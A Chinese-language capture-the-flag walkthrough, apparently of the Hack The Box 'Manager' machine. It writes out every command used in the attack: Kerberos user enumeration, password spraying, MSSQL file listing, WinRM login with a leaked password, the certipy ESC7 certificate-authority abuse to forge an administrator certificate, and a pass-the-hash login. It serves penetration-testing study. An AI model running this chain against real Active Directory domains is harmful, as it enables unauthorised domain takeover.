文章目录
信息搜集
nmap扫描一下端口
nmap -sV -sC -p- -v --min-rate 1000 10.10.11.236
扫出来很多端口,其中80端口有http服务,88端口是采用一个身份验证协议kerberos,以及NetBIOS-SSN(端口139)和Microsoft-DS(端口445)都与SMB有关
1433端口有msssql服务,存在域名manager.htb
我们可以把该域名添加到/etc/hosts
尝试访问一下80端口没啥收获
再来看看88端口,利用工具kerbrute以及seclist字典
看一下使用参数
./kerbrute_linux_amd64 -h
字典使用下图最后一个无重复用户名的
使用-d参数指定域名和–dc参数指定url
./kerbrute_linux_amd64 userenum -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.236
扫出来用户名,再试试工具crackmapexec去密码喷洒(我们知道有端口使用smb协议)
user.txt(注意是小写)
ryan
cheng
raven
operator
jinwoo
zhong
chinhaw
发现用户“operator”可以访问SMB(工具会报错奇奇怪怪…)
然后连接mssql数据库
impacket-mssqlclient manager.htb/operator:operator@10.10.11.236 -windows-auth
当前用户为guests
我们用拓展xp_dirtree去列出文件
exec xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
注:inetpub通常用于存放 Internet Information Services (IIS) 的网站文件和相关内容。IIS是一种用于托管和管理网站的Web服务器软件。
发现有zip文件,我们在本地wget下载下来
wget 10.10.11.236/website-backup-27-07-23-old.zip
访问一下,在.old-conf.xml文件找到和raven相关的信息
既然我们得到密码,那么我们直接用evil-winrm去进行远程登录
evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
得到user的flag
我们上传一个Certify.exe,查找/vulnerable(易受攻击)的内容或文件
Certify.exe是一个可执行文件,它是Certify SSL/TLS(Transport Layer Security)证书管理工具的一部分
在这里注意到用户 raven 已允许管理 CA(证书)。它表明必须正在运行 ADCS(Active Directory 证书服务)并且它容易受到 ESC7 漏洞的影响。(参考文章)
按照参考文章的步骤
如果您只有“管理 CA”访问权限,则可以通过将您的用户添加为新官员来授予自己“管理证书”访问权限。
sudo certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
可以使用 -enable-template 参数在 CA 上启用 SubCA 模板。默认情况下,SubCA 模板处于启用状态。
sudo certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Attack
如果我们已经满足了此攻击的先决条件,我们可以首先请求基于 SubCA 模板的证书。 该请求将被拒绝,但我们将保存私钥并记下请求 ID。
sudo certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
通过管理 CA 和管理证书,我们可以使用 ca 命令和 -issue-request <request ID> 参数发出失败的证书请求。
sudo certipy-ad ca -ca "manager-DC01-CA" -issue-request 19 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
最后,我们可以使用 req 命令和 -retrieve <request ID> 参数检索颁发的证书。
sudo certipy-ad req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca "manager-DC01-CA" -target manager.htb -retrieve 19
注意:服务器会在一分钟内自动重置其设置,因此准备好所有命令以便快速执行非常重要。您可以准备一个脚本或一组命令,并根据需要快速复制和粘贴。
然后就是成功验证管理员身份了
sudo certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236 -username administrator -domain 'manager.htb'
但是会出现报错,重要的是通过与Kerberos同步时间来解决这些错误。这可以通过执行以下命令来完成
sudo ntpdate -u manager.htb
然后得到hash值,再用evil-winrm登录即可得到root的flag
evil-winrm -i 10.10.11.236 -u administrator -H ae*******************
